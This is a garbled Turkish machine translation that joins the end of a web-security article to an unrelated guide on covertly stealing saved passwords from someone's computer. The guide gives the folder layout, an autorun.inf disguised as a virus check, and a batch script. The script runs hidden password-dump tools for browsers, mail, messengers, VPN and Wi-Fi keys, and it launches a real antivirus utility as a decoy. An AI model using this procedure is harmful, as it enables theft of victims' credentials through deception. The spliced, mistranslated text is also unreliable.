Şimdi kullanıcı veya geliştirici yüzünden düşünüyoruz: "Her şey kötü, şifrelerimiz zaten darknette!". Başarısızlıktan kaçınmaya çalışmak için, NPM'yi formlar ve diğer toplama bileşenleri olan sayfalarda kullanmak imkansızdır. Üçüncü taraf reklamcılığı, Google Tag Manager, diyagramlar, analitikleri olan komut dosyalarını kullanamazsınız, hiçbir yabancı kod olmamalıdır, aksi takdirde bir enjeksiyon yapabilirsiniz. Bu, yalnızca kullanıcının bir şey tanıttığı sayfalar için geçerlidir, sitenin geri kalanı reakt-e üzerinde güvenle çalışabilir ve endişelenmeyin.

OFRAME'de gereksiz ve zaten kredi kartı numaralarını, şifreleri ve kimlik bilgilerini toplamayan ayrı bir sayfaya ihtiyacınız var.

Şifre hırsızlığı, kimlik avı yardımı ile gerçekleştirilir (bu siteyi enfekte olmuş bir kopya). Bir hacker posta kutunuza sahip olabilecekse, bu postaya bağlı tüm kayıt ve banka hesaplarını ağladık. 2017 için 12 milyon hesap hacklendi.

Oldukça başarılı ve keylogery - 1 milyon kullanıcı, bu malisress yüzünden oldukça acı çekti.

Sonuç

Kimseye güvenmenin imkansız olduğu ve bilinen güvenlik açıkları olan bir siteyi terk ettiği bir makale kesinlikle yasaktır, çünkü dünyada çok sayıda insanın değerli bir şeyin tadını çıkarmaya istekli çok sayıda insan. Herhangi bir site savunmasızdır ve bu çubukların listesi sürekli değişiyor: Elinizi nabız üzerinde tutmayı unutmayın.

Programcının Kütüphanesi tarafından uygulanan Rusça'ya çeviri.



gerçekhapiste!

Bir bilgisayardan şifreleri nasıl çalabileceğinizi anlamaya çalışalım, ancak mağdurun hiçbir şeyden şüphelenmez.

Bir yol, kullanıcının rahatlığı için şifreleri kaydeden tarayıcılardan ve diğer programlardan parolaları ve diğer programlardan çekebilecek özel bir flash sürücü oluşturmaktır.

İhtiyacımız olan Şifre Kurtarma Yardımcı Programlarını İndirin:

* MESSENPASS - Parolaları en popüler anlık mesajlaşma programlarına geri yükler: MSN Messenger, Windows Messenger (Windows XP'de), Windows Live Messenger (Windows XP ve Vista'da), Yahoo Messenger (sürüm 5.x / 6.x), ICQ Lite 4 .x / 5.x / 2003, AOL Anında Messenger, AIM 6.x, AIM PRO, Trillian, Miranda ve Gaim;

* Posta Passview - Posta istemcilerinden kaydedilen şifreler: Outlook Express, Microsoft Outlook 2000 (yalnızca POP3 / SMTP Hesapları), Microsoft Outlook 2002/2003/2007, Windows Mail, Incredimail, Eudora, Netscape Mail, Mozilla Thunderbird, Grup Mail Ücretsiz, Ve web tabanlı e-posta hesapları;

* IE ÖDEME - "eşek" tarafından kaydedilen girişleri ve şifreleri görüntüler;

* ChromePass - Google Chrom Browser tarafından kaydedilen giriş ve şifreleri görüntüler;

* PasswordFox - Firefox "OM tarafından kaydedilen tüm şifreleri alır;

* Korumalı Depolama Passview - Korumalı depoda saklanan tüm şifreleri geri yükler;

* Dialupass - Tüm Dialup / VPN Şifreleri oturumlarını çeker;

* Ağ şifresi kurtarma - Yerel ağdaki bir top için kullandığınız şifreleri ve şifreleri .NET Passport / Messenger hesabı;

* PSTPASSWORD - Outlook'un kişisel klasör dosyalarından şifreleri özler - .pst;

* WirelessKeyView - Bilgisayarınızda depolanan tüm kablosuz ağ tuşlarını (WEP / WPA) geri yükler.

Ayrıca bir operapassview yardımcı programı da var, ancak henüz komut satırını desteklemiyor. Bu nedenle, setimize dahil değildir.
Tüm yardımcı programlar alınabilir.

Ayrıca Hidden Start () yardımcı programına da ihtiyacımız var.

Ayrıca hizmetlerimizi gizlemek için indirin. "Tõrena" parola işleminin sonunda çalışacağız. Ve sadece işi kurbanı ekranında görecek.

Bir flash sürücü hazırlıyoruz.

1. Flashka'da iki klasör oluşturun:
flashka: \\ prog \\
flashka: \\ prog \\ log \\

2. Flashka klasöründe: \\ Prog \\ Pour Tüm dışkı - yardımcı programlar, hstart.exe, kk.exe

3. Flash sürücünün kökünde, aşağıdaki içeriğe sahip Autorun.inf'u oluşturun:


oPEN \u003d PROG / HSTART / NOCONSOLE "launch.bat"
Eylem \u003d virüsler için bilgisayarı kontrol edin


Burada eylem, bir flash sürücüyü bağladığınızda ve bu işlem seçildiğinde gerçekleştirmek istediğiniz bir komut olduğunda, eylem seçim penceresinde görüntülenecek bir düğmedir. Bu komut, Hidden Start Utility programını kullanarak BAT Nick'in Gizli bir modda başlatılmasını içerir.

4. Bir Batnick launch.bat oluşturun:

eko kapalı
eCHO% Computername% \\% Kullanıcı Adı% BTE %% Saat \u003e\u003e Prog / Log / _Log.txt
başlat Prog / chromepass.exe / Stext Prog / Log /% Computername% _Chrom.txt
başlat Prog / Dialupass.exe / Stext Prog / Log /% ComputerName% _Dialupass.txt
başlat PROG / IEPV.EXE / Stext Prog / Log /% ComputerName% _iepv.txt
başlat prog / mailpv.exe / strext prog / log /% computername% _mailpv.txt
prog / mspass.exe / strex prog / log /% computerName% _mspass.txt başlatmak
başlat Prog / Netpass.exe / Stext Prog / Log /% ComputerName% _Netpass.txt
başlat prog / pspv.exe / Stext Prog / Log / ComputerName% _SPV.TXT
başlat Prog / PstPassword.exe / Stext Prog / Log /% Computername% _PstPassword.txt
başlat Prog / windowkeyview.exe / Stext Prog / Log / Log /% Computername% _wirelesskeyview.txt

Değilse "% ProgramFiles% \\ Mozilla Firefox \\" Goto ucu
başlat Prog / PasswordFox.exe / Stext Prog / Log / Log /% Computername% _PasswordFox.txt
: Son.
prog / KK.EXE'yi başlatın

Batnik ekibini daha ayrıntılı olarak düşünün:

yankı - çıktıyı infazın CMD penceresine yasaklama

eCHO% ComputerName% \\% Kullanıcı adı% BTE %% Saat \u003e\u003e prog / log / _log.txt - prog / log / _log.txt dosyasına - bilgisayar, kullanıcı adı, tarih ve saatin adını kaydedin

prog / chromepass.exe / Stext Prog / Log / ComputerName% _chrom.txt - Parolaları Prog / Log dosyasına kaydetmesi gereken ChromePass.exe yardımcı programını çalıştırın.

Benzer şekilde diğer yardımcı programlar için. Tek not, PasswordFox.exe başlatmadan önce, FF'nin genellikle kurbanın bilgisayarına yüklendiğini kontrol edin. Sadece FF yüklenmemişse, PasswordFox.exe yardımcı programı bir hata mesajı verir.

prog / KK.EXE'yi başlatın - Worm Net-Worm.win32.Kido'yu Kaspersky Lab'den çıkarmak için gerçek bir yardımcı programın başlatılmasıyla eylemlerinizi gizliyoruz.

Hepsi - Flashka hazır. Artık saldırgan sadece bir flash sürücüyü kurbanın bilgisayarına bağlamak ve bu bilgisayardaki tüm kaydedilmiş şifreleri çıkarmak için "Virüslerdeki Comp'yı işaretleyin" seçeneğini belirleyin. "Virüs Kontrolü" ni başlatma ihtiyacının gerekçesi, özellikle kurban size güveniyorsa yeterince basittir.

Nasıl başa çıkılır?

1. Şifreleri kaydetmeyin - bazı şifre kaleci veya ewallet tipi programı kullanmak daha iyidir.

3. Normal bir antivirüsün kullanılabilirliği mutlaka! Her ne kadar kilim sadece bu yardımcı programların birçoğuna gidecek.

Bu makaleyi yazmanın nedeni "Hacker" dergisinde bir not oldu.

Bu makale yalnızca bilgilendirme amaçlı yazılmıştır.
Amacı, verilerinizin saldırgandan korunmasıdır.
Kim farkında, silahlı!

Diğer şifrelerin çalınması, Sanatın 1. Bölümünde Cezai Yükümlülüğü gerektirir. Ceza Kanunu'nun 272 "Bilgisayar bilgilerine izinsiz erişim" ve tehdit ediyor gerçekhapiste!